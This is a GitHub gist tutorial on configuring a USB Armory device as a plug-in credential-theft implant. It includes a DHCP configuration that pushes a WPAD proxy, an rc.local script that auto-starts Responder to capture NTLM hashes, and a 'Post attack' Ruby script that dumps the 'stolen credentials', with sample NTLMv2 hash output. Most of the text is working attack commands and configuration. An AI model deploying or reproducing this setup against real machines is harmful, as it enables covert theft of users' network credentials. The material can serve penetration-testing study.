Skip to content

Instantly share code, notes, and snippets.

@KINGSABRI

KINGSABRI/USBArmoryHowTo.md

Last active June 24, 2017 22:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KINGSABRI/b63bb9cd61c52fd968ef9076e3fbc593 to your computer and use it in GitHub Desktop.
Save KINGSABRI/b63bb9cd61c52fd968ef9076e3fbc593 to your computer and use it in GitHub Desktop.
Download ZIP
USB Armory How to tutorial
Raw
USBArmoryHowTo.md

Installing Image

wget -c wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip

fdisk -l

Burn the image on the microSDcard

dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync

Setting up repositories

https://debgen.simplylinux.ch

nano /etc/apt/source.list

remove all current repos and add the following

###### Debian Main Repos
deb http://deb.debian.org/debian/ stable main contrib non-free
deb-src http://deb.debian.org/debian/ stable main contrib non-free

deb http://deb.debian.org/debian/ stable-updates main contrib non-free
deb-src http://deb.debian.org/debian/ stable-updates main contrib non-free

deb http://deb.debian.org/debian-security stable/updates main
deb-src http://deb.debian.org/debian-security stable/updates main

deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main

now update your repository

apt update
apt upgrade

Enable internet on USB aromory for

On your linux machine

iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE

since wls1 is the internet facing interface

Bash autocompletion

apt install bash-completion

nano /etc/bash.bashrc

search for (ctrl+w)

# enable bash completion in interactive shells

Then uncomment the following lines (commented by default)

if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

apply the changes

source /etc/bash.bashrc

Installing basic applications

System applications and liberaries

apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev

Ruby

apt-get install -y ruby ruby-dev 
gem install pry

Python

apt-get install -y python python-pip python-dev 
pip install pycrypto

Attack Setup

Enable IP forwarding

  • Enable kernel ip forwarding
nano /etc/sysctl.conf

uncomment the following line

net.ipv4.ip_forward=1
  • Enable firewall masqurading
iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE

DHCPd setup

#
# Sample configuration file for ISC dhcpd for Debian
#

# have support for DDNS.
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;


# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.2 10.0.0.3;
  default-lease-time 60;
  max-lease-time 72;
  option routers 10.0.0.1;
  option local-proxy-config "http://10.0.0.1/wpad.dat";
}

Responder setup

Download responder

mkdir /pentest
cd /pentest
git clone https://github.com/spiderlabs/responder
chmod +x Responder.py

Make startups

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
  while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
    sleep 1;
  done
  /usr/sbin/dpkg-reconfigure openssh-server
fi

# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
then
    echo "Staring DHCPd" >> /root/rc.log
    echo '' > /var/lib/dhcp/dhcpd.leases
    /usr/sbin/dhcpd
fi

# Start Responder
echo "Staring Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

Post attack

To get all stolen credentials from responder, Go to /pentest/responder/Responder.db or use the following script to parse the outputs.

Install sqlite3 gem

gem install sqlite3

run the following script

#!/usr/bin/env ruby 
#
# Responder database reader 
#
require "sqlite3"

if ARGV.size == 1 
  responder_db = ARGV[0]
else
  puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
  exit 
end 

# Open
db = SQLite3::Database.new responder_db
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of recrods: #{records.size}"
sleep 1

records.each do |record|
 puts "Timestamp:  #{record[0]}"
 puts "Module:     #{record[1]}"
 puts "HashType:   #{record[2]}"
 puts "IPaddress:  #{record[3]}"
 puts "Hostname:   #{record[5].split('\\')[0]}"
 puts "Username:   #{record[5].split('\\')[1]}"
 puts "Cleartext:  #{record[6]}"
 puts "Hash:       #{record[7]}"
 puts "Full Hash:  #{record[8]}"
 puts 
end 
ruby responder-reader.rb /pentest/responder/Responder.db

result

[+] Number of recrods: 1
Timestamp:  2017-06-21 06:23:10
Module:     HTTP
HashType:   NTLMv2
IPaddress:  10.0.0.2
Hostname:   DESKTOP-9INJ6LJ
Username:   KING
Cleartext:  
Hash:       8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash:  KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment